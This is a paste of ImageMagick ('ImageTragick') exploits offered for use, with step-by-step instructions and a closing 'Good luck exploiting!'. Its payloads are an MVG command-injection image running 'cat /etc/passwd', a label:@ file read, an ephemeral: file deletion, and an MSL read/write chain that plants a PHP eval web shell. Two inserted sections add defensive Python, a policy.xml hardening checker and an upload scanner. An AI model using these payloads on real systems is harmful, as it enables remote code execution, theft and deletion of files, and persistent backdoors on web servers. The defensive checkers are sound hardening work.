4GETmeICA

exploit from darknet

Apr 5th, 2017
[+]======================================================================[+]
[|] Exploiting ImageMagick [|]
[|] By @DigitalGangster [|]
[+]======================================================================[+]
[|] What is it? [|]
[+]======================================================================[+]
[|] [|]
[|] ImageMagick is popular software used to convert, edit [|]
[|] and manipulate images. It has libraries for all common [|]
[|] programming languages, including PHP, Python, Ruby and [|]
[|] many others. It is also very simple to use, which led to [|]
[|] it being used by many developers when in need of image [|]
[|] cropping or manipulation. [|]
[|] [|]
[+]======================================================================[+]
[|] Vulnerability [|]
[+]======================================================================[+]
[|] [|]
[|] ImageMagick doesn't properly filter the file names that [|]
[|] get passed to the internal delegates that handle external [|]
[|] protocols (e.g. HTTPS). This allows an attacker to execute [|]
[|] commands remotely by uploading an image. This leads to a [|]
[|] full RCE vulnerability in your image uploader. [|]
[|] [|]
[+]======================================================================[+]
[|] Exploit Code [|]
[+]======================================================================[+]
[|] Should work for all image files (.jpg/.mvg/.svg/.png/etc.) [|]
[+] Exploit Image contents: [|]
[|] [|]
[|] push graphic-context [|]
[|] viewbox 0 0 640 480 [|]
[|] fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")' [|]
[|] [|]
[+] Example Image: [|]
[|] [|]
[|] push graphic-context [|]
[|] viewbox 0 0 640 480 [|]
[|] fill 'url(https://example.com/image.jpg "|cat /etc/passwd")' [|]
[|] pop graphic-context [|]
[|] [|]
[|] More examples: https://ghostbin.com/paste/vd3u5 [|]
[+]======================================================================[+]
[|] How to Exploit [|]
[+]======================================================================[+]
[|] [|]
[|] 1. Find an image uploader that uses ImageMagick to process images. [|]
[|] (Try it @ http://attack32.samsclass.info/im.htm) [|]
[|] 2. Craft a malicious image file. [|]
[|] 3. If it is running a vulnerable version, you'll have full RCE! [|]
[|] [|]
[|] Sometimes popular CMSs such as vBulletin, myBB, and WordPress [|]
[|] implement ImageMagick to process user images! [|]
[|] [|]
[|] Good luck exploiting! [|]
[|] -@DigitalGangster [|]
[+]======================================================================[+]
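Added example, not part of this paste: the server-side mitigation for the delegate and coder abuse described above is ImageMagick's policy.xml. This Python check parses a policy and reports which of the coders exercised by this write-up's payloads (URL, HTTPS, MVG, MSL, EPHEMERAL) and the "@file" path rule used by label:@ are still allowed. The two sample policies are constructed; the ImageTragick advisory's recommended deny list is longer than the one checked here.

```python
import xml.etree.ElementTree as ET

# Coders used by the payloads in this write-up, plus the path rule that denies
# "@file" reads (label:@/etc/passwd). Extend this set to the advisory's full
# list (TEXT, SHOW, WIN, PLT) for a production check; this example is deliberately
# limited to what the paste demonstrates.
REQUIRED_CODER_BLOCKS = {"URL", "HTTPS", "MVG", "MSL", "EPHEMERAL"}
REQUIRED_PATH_BLOCKS = {"@*"}


def blocked_patterns(policy_xml: str, domain: str) -> set:
    """Patterns in `domain` whose rights are set to none (i.e. denied)."""
    root = ET.fromstring(policy_xml)
    return {
        p.get("pattern", "")
        for p in root.iter("policy")
        if p.get("domain") == domain and p.get("rights") == "none"
    }


def missing_hardening(policy_xml: str) -> dict:
    """Which required coder and path denials the policy lacks (empty lists = hardened)."""
    return {
        "coder": sorted(REQUIRED_CODER_BLOCKS - blocked_patterns(policy_xml, "coder")),
        "path": sorted(REQUIRED_PATH_BLOCKS - blocked_patterns(policy_xml, "path")),
    }


# Constructed sample: a stock-looking policy that only caps resource usage.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>"""

# Constructed sample: the same policy with the delegate coders and @file reads denied.
HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>"""

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, missing_hardening(policy))
```

To check a real installation, pass the contents of the policy.xml that `convert -list policy` reports as loaded, since several policy files can exist on one host.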


# Digital Gangster [2016-05-13]
ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.

Here are some useful tricks to complement the fill 'url()' vulnerability
described by @DigitalGangster.

== 1 ==

It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:

push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension. You can change it to .png, .jpg, or anything
else.

If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.


== 2 ==

You can use a similar technique to delete a file, provided ImageMagick is built
with support for its ephemeral protocol:

push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context


== 3 ==

You can move files around, provided you're able to determine the location of
uploaded files. This can be used to upload new files as well as overwrite
existing files.

first_image.png:

<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/var/www/uploads/second_image.png"/>
<write filename="/var/www/hi.php"/>
</image>


second_image.png:

push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-context


third_image.png:

push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-context


# Digital Gangster [2016-05-16]
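Added example, not the author's code: every payload in tricks 1 to 3 and in the fill 'url()' exploit above is MVG or MSL text renamed to a raster extension, so an upload handler can catch them before ImageMagick ever runs. This Python scanner applies two checks to each upload: the magic bytes against the claimed extension, and markers of the constructs these payloads use (drawing commands, the url("|cmd") pipe, label:@, ephemeral:/msl:, MSL read/write). The finding labels and sample uploads are constructed for this example.

```python
import os
import re

# Magic bytes for the formats an image uploader typically claims to accept.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}

# Markers of the constructs used in this write-up. Label names are assumptions.
MARKERS = [
    (re.compile(rb"push\s+graphic-context", re.I), "mvg-drawing-command"),
    (re.compile(rb'url\s*\(\s*[^)]*"\s*\|', re.I), "delegate-pipe"),
    (re.compile(rb"\blabel:@", re.I), "at-file-read"),
    (re.compile(rb"\b(ephemeral|msl):", re.I), "pseudo-protocol"),
    (re.compile(rb"<\s*(read|write)\s+filename\s*=", re.I), "msl-xml"),
]


def scan_upload(filename: str, data: bytes) -> list:
    """Findings for one upload, in a fixed order; an empty list means clean."""
    findings = []
    magic = MAGIC.get(os.path.splitext(filename)[1].lower())
    # A claimed raster format without its header is what every payload in this
    # write-up looks like: MVG/MSL text renamed to .png or .jpg.
    if magic is not None and not data.startswith(magic):
        findings.append("magic-mismatch")
    for pattern, label in MARKERS:
        if pattern.search(data):
            findings.append(label)
    return findings


# Constructed sample uploads: payloads from this paste, plus a genuine PNG header.
SAMPLES = {
    "exploit.jpg": b"push graphic-context\nviewbox 0 0 640 480\n"
                   b"fill 'url(https://example.com/image.jpg \"|cat /etc/passwd\")'\n"
                   b"pop graphic-context\n",
    "read.png": b"push graphic-context\nimage over 0,0 0,0 'label:@/etc/passwd'\n",
    "first_image.png": b'<?xml version="1.0" encoding="UTF-8"?>\n<image>\n'
                       b'<read filename="/var/www/uploads/second_image.png"/>\n'
                       b'<write filename="/var/www/hi.php"/>\n</image>\n',
    "third_image.png": b"push graphic-context\n"
                       b"image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'\n",
    "real.png": b"\x89PNG\r\n\x1a\n" + bytes(16),
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name}: {scan_upload(name, data) or 'clean'}")
```

The magic-byte check alone flags all four payloads; the marker checks are there to tell an MVG delegate payload from an MSL read/write chain when triaging what was attempted.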